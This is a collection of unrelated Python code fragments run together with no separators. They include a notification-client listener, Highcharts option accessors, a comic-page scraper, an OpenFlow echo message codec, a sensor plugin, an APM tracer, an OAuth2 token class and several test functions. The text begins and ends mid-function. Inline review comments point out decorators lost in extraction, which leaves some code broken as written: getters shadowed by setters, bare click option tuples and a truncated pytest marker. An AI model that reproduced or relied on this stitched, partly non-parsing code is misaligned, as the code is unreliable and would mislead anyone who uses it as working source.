            current_offset = (0 if (v is None) else v)
            try:
                while getattr(t, '_flag', True):
                    notifications = list_events_from_offset(client, current_offset, NOTIFICATION_TIMEOUT_SECONDS)
                    if (len(notifications) > 0):
                        if (event_keys is not None):
                            events = client.filter_events(event_keys=event_keys, events=notifications)
                        else:
                            events = notifications
                        p.process(events)
                        # Resume after the last event seen, filtered or not.
                        current_offset = notifications[(len(notifications) - 1)].offset
            except Exception as e:
                logging.exception('Exception when listening events, %s', e)
                raise e
        thread = threading.Thread(target=listen, args=(self, offset, listener_processor), daemon=True)
        thread.start()
        self.lock.acquire()
        try:
            self.threads[thread.__hash__()] = thread
        finally:
            self.lock.release()
        return ListenerRegistrationId(id=str(thread.__hash__()))

    def unregister_listener(self, registration_id: ListenerRegistrationId):
        """Signal the listener thread behind *registration_id* to stop,
        join it, and drop it from the registry."""
        self.lock.acquire()
        key = int(registration_id.id)
        try:
            if (key in self.threads):
                thread = self.threads[key]
                thread._flag = False
                thread.join()
                del self.threads[key]
        finally:
            self.lock.release()

    def list_all_events(self, start_time: int=None, start_offset: int=None, end_offset: int=None) -> List[Event]:
        """List events across all keys/namespaces in the given time/offset
        window; returns [] when the server reports none."""
        request = ListAllEventsRequest(start_time=start_time, start_offset=start_offset, end_offset=end_offset)
        response = self.notification_stub.listAllEvents(request)
        if (response.return_code == ReturnStatus.SUCCESS):
            if (response.events is None):
                return []
            else:
                events = []
                for event_proto in response.events:
                    event = event_proto_to_event(event_proto)
                    events.append(event)
                return events
        else:
            raise Exception(response.return_msg)

    def list_events(self, key: str=None, namespace: str=None, sender: str=None, begin_offset: int=None, end_offset: int=None) -> List[Event]:
        """List events matching the given key/namespace/sender filters in
        the offset window; returns [] when the server reports none."""
        request = ListEventsRequest(key=key, namespace=namespace, sender=sender, start_offset=begin_offset, end_offset=end_offset)
        response = self.notification_stub.listEvents(request)
        if (response.return_code == ReturnStatus.SUCCESS):
            if (response.events is None):
                return []
            else:
                events = []
                for event_proto in response.events:
                    event = event_proto_to_event(event_proto)
                    events.append(event)
                return events
        else:
            raise Exception(response.return_msg)

    def time_to_offset(self, time: datetime) -> int:
        """Map a datetime to the server-side event offset at that instant.

        NOTE: the parameter shadows the module-level ``time`` inside this
        method body.
        """
        timestamp = int((time.timestamp() * 1000))
        request = TimeToOffsetRequest(timestamp=timestamp)
        response = self.notification_stub.timestampToEventOffset(request)
        return response.offset

    def count_events(self, key: str=None, namespace: str=None, sender: str=None, begin_offset: int=None, end_offset: int=None) -> Tuple[(int, List[SenderEventCount])]:
        """Count matching events; returns (total, per-sender counts)."""
        request = CountEventsRequest(key=key, namespace=namespace, sender=sender, start_offset=begin_offset, end_offset=end_offset)
        response = self.notification_stub.countEvents(request)
        if (response.return_code == ReturnStatus.SUCCESS):
            sender_event_counts = []
            for sender_event_count_proto in response.sender_event_counts:
                sender_event_count = event_count_proto_to_event_count(sender_event_count_proto)
                sender_event_counts.append(sender_event_count)
            return (response.event_count, sender_event_counts)
        else:
            raise Exception(response.return_msg)

    def filter_events(self, event_keys: List[str], events: List[Event]) -> List[Event]:
        """Return the subset of *events* whose key is in *event_keys* and
        whose namespace matches this client's namespace (when set)."""
        def match(key, namespace, event: Event) -> bool:
            if ((key is not None) and (key != event.key)):
                return False
            if ((namespace is not None) and (namespace != event.namespace)):
                return False
            return True
        results = []
        for e in events:
            for k in event_keys:
                if match(k, self.namespace, e):
                    results.append(e)
                    break
        return results
class OptionSeriesColumnrangeSonificationTracksActivewhen(Options):
    """Accessor pairs for the Highcharts sonification ``activeWhen`` options.

    NOTE(review): each getter/setter pair shares one name; the
    ``@property`` / ``@<name>.setter`` decorators appear to have been
    stripped in extraction (as written, each getter is immediately shadowed
    by its setter). Confirm against the generated original.
    """

    # Threshold: activate while the property crosses below this value.
    def crossingDown(self):
        return self._config_get(None)

    def crossingDown(self, num: float):
        self._config(num, js_type=False)

    # Threshold: activate while the property crosses above this value.
    def crossingUp(self):
        return self._config_get(None)

    def crossingUp(self, num: float):
        self._config(num, js_type=False)

    # Upper bound of the active range for the tracked property.
    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    # Lower bound of the active range for the tracked property.
    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    # Name of the point property being tracked.
    def prop(self):
        return self._config_get(None)

    def prop(self, text: str):
        self._config(text, js_type=False)
def get_episodes(html, url):
    """Extract episode links from a DM5 comic page.

    The markup lists episodes in one order; the DM5_COMIC_SORT=1 cookie
    marker tells us whether that order is already the desired one or must
    be reversed.
    """
    episodes = []
    pattern = '<li>\\s*<a href="(/m\\d+/)"[^>]*>(.+?)</a>'
    for match in re.finditer(pattern, html, re.DOTALL):
        ep_url, title = match.groups()
        episodes.append(Episode(clean_tags(title), urljoin(url, ep_url)))
    # With the sort flag present the page order is already correct;
    # otherwise the listing is newest-first and must be reversed.
    return episodes if ('DM5_COMIC_SORT=1' in html) else episodes[::(- 1)]
class echo_request(message):
    """OpenFlow 1.5 (wire version 6) ECHO_REQUEST message codec.

    NOTE(review): pack() joins str fragments and unpack() wraps the payload
    in str() — this is Python-2-era code (bytes/str conflation); porting to
    Python 3 would require bytes throughout.
    """

    version = 6  # OpenFlow protocol version (1.5)
    type = 2     # OFPT_ECHO_REQUEST

    def __init__(self, xid=None, data=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (data != None):
            self.data = data
        else:
            self.data = ''
        return

    def pack(self):
        """Serialize header + payload; the length field is back-patched
        once the total size is known."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder
        packed.append(struct.pack('!L', self.xid))
        packed.append(self.data)
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    # NOTE(review): no ``self`` parameter — a @staticmethod decorator
    # appears to have been stripped in extraction.
    def unpack(reader):
        """Parse one echo_request from *reader*; asserts version/type and
        bounds the payload read by the declared message length."""
        obj = echo_request()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 2)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Restrict further reads to this message (4 bytes already consumed).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        obj.data = str(reader.read_all())
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.data != other.data):
            return False
        return True

    def pretty_print(self, q):
        """Render a debug representation via the pretty-printer *q*."""
        q.text('echo_request {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('data = ')
                q.pp(self.data)
            q.breakable()
        q.text('}')
class TopicFactory(factory.django.DjangoModelFactory):
    """Factory producing unlocked forum Topics with faker-generated
    subjects and matching slugs."""

    forum = factory.SubFactory(ForumFactory)
    poster = factory.SubFactory(UserFactory)
    status = Topic.TOPIC_UNLOCKED
    # Random subject capped at 200 characters (the model's field limit).
    subject = factory.LazyAttribute((lambda t: faker.text(max_nb_chars=200)))
    # Slug derived from the generated subject.
    slug = factory.LazyAttribute((lambda t: slugify(t.subject)))

    class Meta():
        model = Topic
class Plugin(plugin.PluginProto):
    """RPIEasy environment plugin P028: BMP280/BME280 I2C sensor.

    Reports temperature, humidity (BME280 only) and pressure.
    """

    PLUGIN_ID = 28
    PLUGIN_NAME = 'Environment - BMP280/BME280'
    PLUGIN_VALUENAME1 = 'Temperature'
    PLUGIN_VALUENAME2 = 'Humidity'
    PLUGIN_VALUENAME3 = 'Pressure'

    def __init__(self, taskindex):
        plugin.PluginProto.__init__(self, taskindex)
        self.dtype = rpieGlobals.DEVICE_TYPE_I2C
        self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM_BARO
        # Guards against overlapping reads from the scheduler.
        self.readinprogress = 0
        self.valuecount = 3
        self.senddataoption = True
        self.timeroption = True
        self.timeroptional = False
        self.formulaoption = True
        self._nextdataservetime = 0
        self.bme = None
        # Set to True when the chip id identifies a humidity-capable BME280.
        self.hashumidity = False

    def plugin_init(self, enableplugin=None):
        """(Re)initialize the sensor on the configured I2C address and detect
        the chip variant (BME280 vs BMP280)."""
        plugin.PluginProto.plugin_init(self, enableplugin)
        self.uservar[0] = 0
        self.uservar[1] = 0
        self.uservar[2] = 0
        sensoraddress = int(self.taskdevicepluginconfig[0])
        # Only 0x76 (118) and 0x77 (119) are valid BMx280 addresses.
        if (self.enabled and (sensoraddress in [118, 119])):
            try:
                self.bme = None
                try:
                    i2cl = self.i2c
                except:
                    i2cl = (- 1)
                i2cbus = gpios.HWPorts.i2c_init(i2cl)
                if (i2cl == (- 1)):
                    i2cbus = gpios.HWPorts.i2cbus
                self.bme = Bme280(i2c_bus=i2cbus, sensor_address=sensoraddress)
                if ((self.bme is not None) and (i2cbus is not None) and self.bme.init):
                    # Schedule the first read ~2s before the next interval tick.
                    if (self.interval > 2):
                        nextr = (self.interval - 2)
                    else:
                        nextr = self.interval
                    self._lastdataservetime = (rpieTime.millis() - (nextr * 1000))
                else:
                    misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, 'BME through I2C can not be initialized!')
                    self.initialized = False
            except Exception as e:
                misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, str(e))
                self.initialized = False
        if self.enabled:
            # Chip id 0x60 (96) -> BME280 (has humidity); 0x56-0x58 -> BMP280.
            chiptype = self.bme.get_chip_id()
            self.hashumidity = False
            chipname = 'Unknown'
            if (chiptype == 96):
                chipname = 'BME280'
                self.hashumidity = True
                self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM_BARO
            elif (chiptype in [86, 87, 88]):
                chipname = 'BMP280'
                self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_EMPTY_BARO
            misc.addLog(rpieGlobals.LOG_LEVEL_INFO, ((((chipname + ' (') + str(chiptype)) + ') initialized, Humidity: ') + str(self.hashumidity)))

    def webform_load(self):
        """Render the plugin's settings form (I2C address selector)."""
        choice1 = self.taskdevicepluginconfig[0]
        options = ['0x76', '0x77']
        optionvalues = [118, 119]
        webserver.addFormSelector('Address', 'plugin_028_addr', 2, options, optionvalues, None, int(choice1))
        webserver.addFormNote("Enable <a href='pinout'>I2C bus</a> first, than <a href='i2cscanner'>search for the used address</a>!")
        return True

    def webform_save(self, params):
        """Persist the chosen I2C address; re-init only when it changed."""
        initpar = self.taskdevicepluginconfig[0]
        par = webserver.arg('plugin_028_addr', params)
        if (par == ''):
            par = 0
        self.taskdevicepluginconfig[0] = int(par)
        if (initpar != self.taskdevicepluginconfig[0]):
            try:
                self.plugin_init()
            except:
                pass
        return True

    def plugin_read(self):
        """Read temperature/humidity/pressure and publish the values.

        NOTE(review): humidity is set even for BMP280 (hashumidity False) —
        presumably the driver returns a dummy value there; verify.
        """
        result = False
        if (self.initialized and (self.readinprogress == 0) and self.enabled):
            self.readinprogress = 1
            (temp, press, hum) = self.bme.get_data()
            self.set_value(1, temp, False)
            self.set_value(2, hum, False)
            self.set_value(3, press, False)
            self.plugin_senddata()
            self._lastdataservetime = rpieTime.millis()
            result = True
            self.readinprogress = 0
        return result
class ParseConditionTuple(NamedTuple):
    """One parsed taint pre- or post-condition edge: caller/callee ports,
    source location, taint leaves and associated trace metadata."""

    type: Union[(Literal[ParseType.PRECONDITION], Literal[ParseType.POSTCONDITION])]
    caller: str
    caller_port: str
    filename: str
    callee: str
    callee_port: str
    callee_location: SourceLocation
    leaves: List[ParseLeaf]
    type_interval: Optional[ParseTypeInterval]
    features: List[ParseTraceFeature]
    titos: Iterable[SourceLocation]
    annotations: Iterable[ParseTraceAnnotation]

    def interned(self) -> 'ParseConditionTuple':
        """Return a copy whose high-duplication string fields are interned
        (these values repeat heavily across conditions, so interning saves
        memory and speeds up equality checks)."""
        return ParseConditionTuple(
            type=self.type,
            caller=sys.intern(self.caller),
            caller_port=sys.intern(self.caller_port),
            filename=sys.intern(self.filename),
            callee=sys.intern(self.callee),
            callee_port=sys.intern(self.callee_port),
            callee_location=self.callee_location,
            leaves=intern_leaves(self.leaves),
            type_interval=self.type_interval,
            features=[feature.interned() for feature in self.features],
            titos=self.titos,
            annotations=self.annotations,
        )
# NOTE(review): the leading "()" and the bare option tuples below look like
# click decorators ("@click.command()" / "@click.option(...)") whose '@' and
# callable prefixes were lost in extraction — confirm against the original.
()
('--contracts', help='Contracts to lookup', required=False, callback=_arg_split)
('--market', help='Market to lookup', callback=partial(click_validate_enum, Market), required=False)
('--timeframe', help='Timeframe to use (DAILY, HOURLY, MINUTES30 etc)', default=Timeframe.DAILY.name, callback=partial(click_validate_enum, Timeframe), required=False)
('--destdir', help='Destination directory name', required=True, type=click.Path(exists=True, file_okay=False, writable=True, resolve_path=True))
('--skiperr', help='Continue if a download error occurs. False by default', required=False, default=True, type=bool)
('--lineterm', help='Line terminator', default='\r\n')
('--delay', help='Seconds to sleep between requests', type=click.IntRange(0, 600), default=1)
('--startdate', help='Start date', type=Datetime(format='%Y-%m-%d'), default='2007-01-01', required=False)
('--enddate', help='End date', type=Datetime(format='%Y-%m-%d'), default=datetime.date.today().strftime('%Y-%m-%d'), required=False)
('--ext', help='Resulting file extension', default='csv')
def main(contracts, market, timeframe, destdir, lineterm, delay, startdate, enddate, skiperr, ext):
    """Download Finam quote history for the requested contracts (or every
    contract of a market) and write one CSV per contract into *destdir*."""
    exporter = Exporter()
    if (not any((contracts, market))):
        raise click.BadParameter('Neither contracts nor market is specified')
    market_filter = dict()
    if market:
        market_filter.update(market=Market[market])
    if (not contracts):
        # No explicit contracts: export everything the market lists.
        contracts = exporter.lookup(**market_filter)['code'].tolist()
    for contract_code in contracts:
        # NOTE(review): uses module-level ``logging`` here but ``logger``
        # elsewhere — presumably unintentional inconsistency.
        logging.info('Handling {}'.format(contract_code))
        try:
            # NOTE(review): rebinding ``contracts`` inside the loop is safe
            # for iteration (the for-loop holds its own iterator) but is
            # confusing — the lookup result shadows the input list.
            contracts = exporter.lookup(code=contract_code, **market_filter)
        except FinamObjectNotFoundError:
            logger.error('unknown contract "{}"'.format(contract_code))
            sys.exit(1)
        else:
            contract = contracts.reset_index().iloc[0]
            logger.info(u'Downloading contract {}'.format(contract))
            try:
                data = exporter.download(contract.id, start_date=startdate, end_date=enddate, timeframe=Timeframe[timeframe], market=Market(contract.market))
            except FinamExportError as e:
                if skiperr:
                    logger.error(repr(e))
                    continue
                else:
                    raise
            destpath = os.path.join(destdir, '{}-{}.{}'.format(contract.code, timeframe, ext))
            data.to_csv(destpath, index=False, line_terminator=lineterm)
            if (delay > 0):
                logger.info('Sleeping for {} second(s)'.format(delay))
                time.sleep(delay)
class TestAPIOrgLocationViews(TestCase):
    """Integration tests for the org_location GeoJSON API endpoint."""

    fixtures = ['orgs', 'practices']
    api_prefix = '/api/1.0'

    def test_api_view_org_location_all_ccgs(self):
        """All CCGs are returned with polygon geometry."""
        url = ('%s/org_location?org_type=ccg&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(len(content['features']), 2)
        # First ring, first point of the second CCG's multipolygon.
        coord = content['features'][1]['geometry']['coordinates'][0][0][0]
        self.assertAlmostEqual(coord[0], (- 117.))
        self.assertAlmostEqual(coord[1], 33.)

    def test_api_view_org_location_all_ccgs_excluding_closed(self):
        """Closed CCGs are excluded from the listing."""
        closed = PCT.objects.first()
        closed.close_date = datetime.date(2001, 1, 1)
        closed.save()
        url = ('%s/org_location?org_type=ccg&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(len(content['features']), 1)

    def test_api_view_org_location_ccg_by_code(self):
        """CCGs can be selected by a comma-separated code list."""
        url = ('%s/org_location?org_type=ccg&q=03Q,03V&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(len(content['features']), 2)
        coord = content['features'][0]['geometry']['coordinates'][0][0][0]
        self.assertAlmostEqual(coord[0], (- 117.))
        self.assertAlmostEqual(coord[1], 33.)

    # NOTE(review): this bare tuple looks like the arguments of a stripped
    # "@unittest.skipIf(...)" decorator — confirm against the original.
    ((('TRAVIS' in os.environ) and os.environ['TRAVIS']), 'Skipping this test on Travis CI.')

    def test_api_view_org_location_practice_by_code(self):
        """Practices within a CCG are returned as points with metadata."""
        url = ('%s/org_location?org_type=practice&q=03Q&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(len(content['features']), 2)
        props = content['features'][0]['properties']
        self.assertEqual(props['name'], 'AINSDALE VILLAGE SURGERY')
        self.assertEqual(props['setting'], 4)
        coord = content['features'][0]['geometry']['coordinates']
        self.assertEqual(coord[0], 1.0)
        self.assertEqual(coord[1], 51.5)

    def test_api_view_org_location_pcn_by_code(self):
        """PCNs can be selected by code."""
        url = ('%s/org_location?org_type=pcn&q=PCN0001&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        self.assertEqual(len(content['features']), 1)
        props = content['features'][0]['properties']
        self.assertEqual(props['name'], 'Transformational Sustainability')

    def test_api_view_org_location_pcn_by_ccg_code(self):
        """Querying PCNs by a CCG code returns all PCNs in that CCG."""
        url = ('%s/org_location?org_type=pcn&q=03V&format=json' % self.api_prefix)
        response = self.client.get(url, follow=True)
        self.assertEqual(response.status_code, 200)
        content = json.loads(response.content)
        pcn_codes = {feature['properties']['code'] for feature in content['features']}
        self.assertEqual(pcn_codes, {'PCN0001', 'PCN0002'})
def test_all_metrics_tested():
    """Meta-test: every concrete Metric subclass must have at least one
    fixture, and every fixture must generate at least one dataset outcome.

    On failure, prints ready-to-paste import lines and fixture stubs for
    the missing metrics.
    """
    load_test_metrics()
    all_metric_classes = find_all_subclasses(Metric)
    missing = []
    no_datasets = []
    for metric_class in all_metric_classes:
        if (not any(((m.metric.__class__ is metric_class) for m in metric_fixtures))):
            missing.append(metric_class)
        else:
            tms = [tm for tm in metric_fixtures if (tm.metric.__class__ is metric_class)]
            tests = []
            for tm in tms:
                tests.extend(generate_dataset_outcome(tm))
            if (len(tests) == 0):
                no_datasets.append(metric_class)
    # Stub generator: CamelCase class name -> snake_case fixture name.
    suggestion_template = '\ndef {snake_case}():\n    return TestMetric("{snake_case}", {cls}())\n    '
    suggestion = '\n'.join((suggestion_template.format(cls=m.__name__, snake_case=re.sub('(?<!^)(?=[A-Z])', '_', m.__name__).lower()) for m in missing))
    imports = '\n'.join(('from {module} import {cls}'.format(cls=m.__name__, module=m.__module__) for m in missing))
    print(imports)
    print(suggestion)
    assert (len(missing) == 0), f'Missing metric fixtures for {missing}.'
    no_datasets_str = '\n'.join((mc.__name__ for mc in no_datasets))
    assert (len(no_datasets) == 0), f'No datasets configured for metrics {no_datasets_str}'
class Tracer(object):
    """Creates, samples and finishes APM transactions for the agent."""

    def __init__(self, frames_collector_func, frames_processing_func, queue_func, config, agent: 'elasticapm.Client') -> None:
        self.config = config
        # Callable that enqueues finished transactions for sending.
        self.queue_func = queue_func
        self.frames_processing_func = frames_processing_func
        self.frames_collector_func = frames_collector_func
        self._agent = agent
        # Transactions whose name matches any of these are dropped.
        self._ignore_patterns = [re.compile(p) for p in (config.transactions_ignore_patterns or [])]

    # NOTE(review): reads like an accessor — a @property decorator may have
    # been stripped in extraction; confirm against the original.
    def span_stack_trace_min_duration(self) -> timedelta:
        """Resolve the effective threshold, honouring the deprecated
        ``span_frames_min_duration`` setting (0.005s is the shared default,
        so a non-default value on either side decides which wins)."""
        if ((self.config.span_stack_trace_min_duration != timedelta(seconds=0.005)) or (self.config.span_frames_min_duration == timedelta(seconds=0.005))):
            return self.config.span_stack_trace_min_duration
        else:
            warnings.warn('`span_frames_min_duration` is deprecated. Please use `span_stack_trace_min_duration`.', DeprecationWarning)
            # Legacy semantics: negative -> 0 (always), 0 -> -1 (never).
            if (self.config.span_frames_min_duration < timedelta(seconds=0)):
                return timedelta(seconds=0)
            elif (self.config.span_frames_min_duration == timedelta(seconds=0)):
                return timedelta(seconds=(- 1))
            else:
                return self.config.span_frames_min_duration

    def begin_transaction(self, transaction_type: str, trace_parent: Optional[TraceParent]=None, start: Optional[float]=None, auto_activate: bool=True, links: Optional[Sequence[TraceParent]]=None) -> Transaction:
        """Start a transaction, applying the configured trace-continuation
        strategy and sampling decision.

        :param transaction_type: e.g. "request", "task".
        :param trace_parent: incoming distributed-tracing context, if any.
        :param start: explicit start timestamp (epoch seconds).
        :param auto_activate: set the new transaction as the active one.
        :param links: span links to record on the transaction.
        """
        links = (links if links else [])
        continuation_strategy = self.config.trace_continuation_strategy
        if (trace_parent and (continuation_strategy != constants.TRACE_CONTINUATION_STRATEGY.CONTINUE)):
            # "restart" always drops the incoming trace; "restart_external"
            # drops it only when it carries no Elastic tracestate entries.
            if ((continuation_strategy == constants.TRACE_CONTINUATION_STRATEGY.RESTART) or ((continuation_strategy == constants.TRACE_CONTINUATION_STRATEGY.RESTART_EXTERNAL) and (not trace_parent.tracestate_dict))):
                links.append(trace_parent)
                trace_parent = None
        if trace_parent:
            # Inherit the upstream sampling decision and rate.
            is_sampled = bool(trace_parent.trace_options.recorded)
            sample_rate = trace_parent.tracestate_dict.get(constants.TRACESTATE.SAMPLE_RATE)
        else:
            # Root transaction: sample locally according to the configured rate.
            is_sampled = ((self.config.transaction_sample_rate == 1.0) or (self.config.transaction_sample_rate > random.random()))
            if (not is_sampled):
                sample_rate = '0'
            else:
                sample_rate = str(self.config.transaction_sample_rate)
        transaction = Transaction(self, transaction_type, trace_parent=trace_parent, is_sampled=is_sampled, start=start, sample_rate=sample_rate, links=links)
        if (trace_parent is None):
            # Propagate our local sampling rate downstream via tracestate.
            transaction.trace_parent.add_tracestate(constants.TRACESTATE.SAMPLE_RATE, sample_rate)
        if auto_activate:
            execution_context.set_transaction(transaction)
        return transaction

    def end_transaction(self, result=None, transaction_name=None, duration=None):
        """Finish the active transaction and queue it for sending.

        Ignored/unsampled transactions (against APM server >= 8.0) are
        dropped instead of queued. Returns the transaction, or None when
        none was active.
        """
        transaction = execution_context.get_transaction(clear=True)
        if transaction:
            if (transaction.name is None):
                transaction.name = (str(transaction_name) if (transaction_name is not None) else '')
            transaction.end(duration=duration)
            if self._should_ignore(transaction.name):
                return
            if ((not transaction.is_sampled) and self._agent.check_server_version(gte=(8, 0))):
                return
            if (transaction.result is None):
                transaction.result = result
            self.queue_func(TRANSACTION, transaction.to_dict())
        return transaction

    def _should_ignore(self, transaction_name):
        """True when *transaction_name* matches any ignore pattern."""
        for pattern in self._ignore_patterns:
            if pattern.search(transaction_name):
                return True
        return False
def _access(line: Union[(PitchLine, DurationLine)], position: Union[(int, Tuple[(int, int)])]) -> Union[(Pitch, None, List[Pitch], Duration)]: if isinstance(position, int): item = line[position] else: (i, j) = position item = line[i] if isinstance(item, list): item = item[j] return item
class OAuth2Token(Dict[(str, Any)]):
    """Dict wrapper for an OAuth2 token payload with normalized expiry.

    On construction, ``expires_at`` is coerced to an int epoch timestamp;
    when only a relative ``expires_in`` is present, an absolute
    ``expires_at`` is derived from the current time. Note the input dict
    is updated in place before being copied into this mapping.
    """

    def __init__(self, token_dict: Dict[(str, Any)]):
        if 'expires_at' in token_dict:
            token_dict['expires_at'] = int(token_dict['expires_at'])
        elif 'expires_in' in token_dict:
            now = int(time.time())
            token_dict['expires_at'] = now + int(token_dict['expires_in'])
        super().__init__(token_dict)

    def is_expired(self):
        """Return True when the token's deadline has passed.

        Tokens without any expiry information are treated as non-expiring.
        """
        try:
            deadline = self['expires_at']
        except KeyError:
            return False
        return time.time() > deadline
# NOTE(review): the decorator below is truncated — its leading
# "@pytest.mark" (or equivalent marker object) was lost in extraction;
# confirm against the original file. As written this fragment does not
# parse on its own.
.parametrize('degree, mesh', [(d, m) for d in range(1, 8) for m in (UnitIntervalMesh(2), UnitSquareMesh(2, 2))])
def test_integrate_result_type(degree, mesh):
    """Integrating a Function must yield a plain Python float,
    for every Lagrange degree 1..7 on 1D and 2D meshes."""
    fe = LagrangeElement(mesh.cell, degree)
    fs = FunctionSpace(mesh, fe)
    f = Function(fs)
    i = f.integrate()
    assert isinstance(i, float), ('Integrate must return a float, not a %s' % str(type(i)))
def terminal_get_size(default_size=(25, 80)):
    """Return the terminal size as a tuple of ints (rows, columns).

    Resolution order: TIOCGWINSZ ioctl on stdin/stdout/stderr, then on the
    controlling terminal, then the LINES/COLUMNS environment variables,
    and finally *default_size*.

    :param default_size: fallback (rows, columns) when nothing else works
    :return: tuple of two ints
    """
    def ioctl_gwinsz(fd):
        # Ask the kernel for the window size of the tty behind *fd*;
        # None when fd is not a terminal.
        try:
            return struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
        except Exception:
            return None

    size = (ioctl_gwinsz(0) or ioctl_gwinsz(1) or ioctl_gwinsz(2))
    if (not size):
        try:
            fd = os.open(os.ctermid(), os.O_RDONLY)
            try:
                size = ioctl_gwinsz(fd)
            finally:
                # BUG FIX (robustness): close the fd even if the ioctl path
                # raises; the original could leak it.
                os.close(fd)
        except Exception:
            pass
    if (not size):
        try:
            size = (os.environ['LINES'], os.environ['COLUMNS'])
        except Exception:
            return default_size
    # BUG FIX: the original returned the lazy ``map`` object here (a
    # one-shot iterator on Python 3) while the default path returned a
    # tuple. Always return a concrete (rows, columns) tuple of ints.
    return tuple(int(v) for v in size)
class FIFODUT(Module):
    """Simulation device-under-test wrapping a LiteDRAMFIFO.

    Builds native DRAM read/write ports, the FIFO itself, and a backing
    DRAM memory model sized to hold the FIFO region plus a small margin.
    The ``write``/``read`` methods are simulation generators implementing
    the valid/ready stream handshake; the exact yield ordering is the
    protocol — do not reorder.
    """

    def __init__(self, base, depth, data_width=8, address_width=32, with_bypass=False):
        # With bypass enabled the DRAM ports are 4x wider than the FIFO
        # data width.
        port_data_width = (data_width if (not with_bypass) else (4 * data_width))
        # NOTE(review): the `address_width` parameter is ignored — both
        # ports hard-code address_width=32; confirm whether that is
        # intentional.
        self.write_port = LiteDRAMNativeWritePort(address_width=32, data_width=port_data_width)
        self.read_port = LiteDRAMNativeReadPort(address_width=32, data_width=port_data_width)
        self.submodules.fifo = LiteDRAMFIFO(data_width=data_width, base=base, depth=depth, write_port=self.write_port, read_port=self.read_port, with_bypass=with_bypass)
        # Extra memory beyond base+depth so out-of-range accesses would be
        # visible in the model rather than wrapping.
        margin = 8
        self.memory = DRAMMemory(port_data_width, ((base + depth) + margin))

    def write(self, data):
        """Simulation generator: push one *data* word into the FIFO sink."""
        (yield self.fifo.sink.valid.eq(1))
        (yield self.fifo.sink.data.eq(data))
        (yield)
        # Hold valid until the sink accepts the word.
        while (not (yield self.fifo.sink.ready)):
            (yield)
        (yield self.fifo.sink.valid.eq(0))

    def read(self):
        """Simulation generator: pop and return one word from the FIFO source."""
        # Wait for the source to present valid data.
        while (not (yield self.fifo.source.valid)):
            (yield)
        (yield self.fifo.source.ready.eq(1))
        data = (yield self.fifo.source.data)
        (yield)
        (yield self.fifo.source.ready.eq(0))
        (yield)
        return data
def load_localized_config(name, repodir):
    """Merge all ``config/**/<name>.yml`` files into one localized dict.

    Result shape: ``{afname: {field_key: {locale: value}}}``. Files directly
    under ``config/`` belong to DEFAULT_LOCALE; otherwise the first
    directory below ``config/`` names the locale. ``icon`` entries are
    copied into ``<repodir>/icons`` and stored via ``file_entry``. When no
    file matches, non-standard ``config/*.yml`` names are reported with a
    "did you mean" hint.
    """
    result = dict()
    matched_any = False
    pattern = 'config/**/{name}.yml'.format(name=name)
    for cfg_path in Path().glob(pattern):
        matched_any = True
        # Two path parts means config/<name>.yml → default locale;
        # deeper paths carry the locale as the first sub-directory.
        locale = DEFAULT_LOCALE if (len(cfg_path.parts) == 2) else cfg_path.parts[1]
        with open(cfg_path, encoding='utf-8') as fp:
            parsed = yaml.safe_load(fp)
        if not isinstance(parsed, dict):
            msg = _('{path} is not "key: value" dict, but a {datatype}!')
            raise TypeError(msg.format(path=cfg_path, datatype=type(parsed).__name__))
        for afname, field_dict in parsed.items():
            per_field = result.setdefault(afname, dict())
            for key, value in field_dict.items():
                per_locale = per_field.setdefault(key, dict())
                if key == 'icon':
                    icons_dir = os.path.join(repodir, 'icons')
                    if not os.path.exists(icons_dir):
                        os.makedirs(icons_dir, exist_ok=True)
                    shutil.copy(os.path.join('config', value), icons_dir)
                    per_locale[locale] = file_entry(os.path.join(icons_dir, value))
                else:
                    per_locale[locale] = value
    if not matched_any:
        # Nothing matched: warn about any stray, non-standard config files.
        for cfg_path in Path().glob('config/*.yml'):
            if cfg_path.stem in CONFIG_NAMES:
                continue
            msg = _('{path} is not a standard config file!').format(path=cfg_path)
            close = difflib.get_close_matches(cfg_path.stem, CONFIG_NAMES, 1)
            if close:
                msg += ' '
                msg += _('Did you mean config/{name}.yml?').format(name=close[0])
            logging.error(msg)
    # Normalize: sort every per-key locale mapping by locale name.
    for per_field in result.values():
        for key in per_field:
            per_field[key] = dict(sorted(per_field[key].items()))
    return result
def test_dispersion_load_file():
    """Load tabulated optical data from CSV files and fit dispersion models.

    Exercises both the slow and the fast fitter on n-only and (n, k) data.
    """
    fitter = DispersionFitter.from_file('tests/data/nk_data.csv', skiprows=1, delimiter=',')
    (medium, rms) = fitter.fit(num_tries=2)
    fitter = DispersionFitter.from_file('tests/data/n_data.csv', skiprows=1, delimiter=',')
